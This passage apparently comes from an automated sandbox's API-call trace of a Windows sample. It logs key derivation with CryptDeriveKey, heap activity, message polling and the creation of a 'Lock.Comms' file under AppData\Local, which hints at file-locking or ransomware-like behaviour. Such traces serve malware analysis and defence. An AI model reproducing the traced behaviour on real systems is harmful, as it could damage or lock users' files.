lpUsedDefaultChar=0x0) returned 15 [0155.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaab58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0155.087] CryptDeriveKey (in: hProv=0x9be890, Algid=0x6601, hBaseData=0x9e1c38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1e38) returned 1 [0155.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.087] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0155.087] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0155.087] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0155.087] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0155.087] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0155.087] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0155.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0155.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7040, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0155.088] CryptDestroyHash (hHash=0x9e1c38) returned 1 [0155.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.088] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Comms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\comms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0155.088] GetLastError () returned 0x5 [0155.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0155.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0155.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0155.089] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0155.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0155.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0155.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0155.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0155.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0155.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0155.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0155.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0155.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0155.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0155.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0155.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0155.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0155.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0155.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0155.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0155.116] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0155.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0155.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0155.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0155.117] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Comms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.comms"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0155.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0155.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0155.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0155.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0155.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0155.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0155.118] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0155.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0155.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0155.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0155.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0155.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0155.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0155.119] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0155.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0155.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0155.120] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0155.120] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0155.120] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0155.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0155.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0155.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0155.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0155.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0155.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa20 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0155.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0155.122] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0155.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0155.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0155.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0155.123] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0155.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0155.123] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0155.123] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0155.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0155.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0155.124] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0155.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0155.124] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0155.124] HeapFree (in: hHeap=0x2af0000, 